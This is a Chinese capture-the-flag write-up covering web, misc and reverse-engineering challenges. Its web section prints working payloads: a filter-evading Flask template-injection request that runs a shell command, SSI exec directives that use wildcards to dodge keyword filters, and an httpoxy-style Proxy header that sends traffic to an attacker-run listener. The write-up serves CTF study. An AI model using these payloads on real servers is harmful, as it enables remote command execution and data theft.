前言
这次比赛还是挺有意义的。
WEB
flask
url结尾要是.js?
直接放payload
GET /admin?name={{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}&a=.js?
Cookie: x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
Baby_upload
过滤了很多,但是没有过滤shtml,考虑ssi注入,先试一下这样,发现ls应该是被过滤了
但是还可以用dir /
来看目录下文件,发现有
app home root start.sh bin lib run sys boot lib64 run.sh tmp create_mysql_admin_user.sh media sbin usr dev mnt srv var etc opt start-apache2.sh fffffflllll11111aaaaa4444ggggg proc start-mysqld.sh
很明显的有flag,但是cat tac nl等等读文件的命令都没了,测了一下还有awk,cut,strings.因为fl
是被过滤了的,可以用?来匹配,所以可以构造如下payload
cut -b 1-100 ffffffllll?11111aaaaa4444ggggg
还可以
<!--#exec cmd="/???/??? /ffffff?llll11111aaaaa4444ggggg" -->
flag配送中心
一个httpproxy的cve,当我们在请求报文的头加上
Proxy:http://ip:port
由于php版本的原因,会自动在Proxy前加上HTTP_,导致漏洞产生,所以只需要加个头,然后在服务器上开启监听即可得到flag
Misc
八卦迷宫
跟着走就行
ezsteg
爆破得到密码220101
题目说了steg,py的隐写,用python stegosaurus.py -x steg.pyc
然后emoji-aes输入密钥即可获得flag
朴实无华的取证
先正常的取证操作
然后
得到图片
爆破flag.zip得到密码20211209
然后得到加密脚本
//幼儿园水平的加密(部分)
void Encrypt(string& str)
{
for(int i = 0; i < str.length(); i++)
{
if(str[i] >='a'&& str[i]<='w')
str[i]+=3;
else if(str[i]=='x')
str[i]='a';
else if(str[i]=='y')
str[i]='b';
else if(str[i]=='z')
str[i]='c';
else if(str[i]=='_')
str[i]='|';
str[i] -= 32;
}
}
解密
s = b"fdcb[8ldq?zloo?fhuwdlqobvxffhhg?lq?iljkwlqj?wkh?hslghplf]"
s = s.upper()
for c in s:
c += 32
print(chr(c), end='')
然后凯撒,然后猜出flag
ezencrypt
下载一个流量包,导出对象,一串奇怪的数据,base64之后是zip数据流,然后导出zip
用D盾扫描
应该就是个混淆加密,找网站在线解得到
<?php
namespace app\controller;
use app\BaseController;
class Index extends BaseController
{
public function index()
{
if(!empty($_GET['pop'])){
unserialize(base64_decode($_GET['pop']));
}
return "Welcom To CAZT! Xi'an Come On!";
}
public function C4zyC0m3On()
{
return 'cazy{PHP_ji4m1_1s_s00000_3aSyyyyyyyyyyy}';
}
}
?>
西安加油
流量包提取数据secret.txt,base64解密后存为文件,压缩包,要拼图。自动拼图即可
逆向
combat_slogan
jd-gui反编译发现
rot13解得We_w11l_f1ght_t0_end_t0_end_cazy
cute_doge
shift+f12得到ZmxhZ3tDaDFuYV95eWRzX2Nhenl9…
flag{Ch1na_yyds_cazy}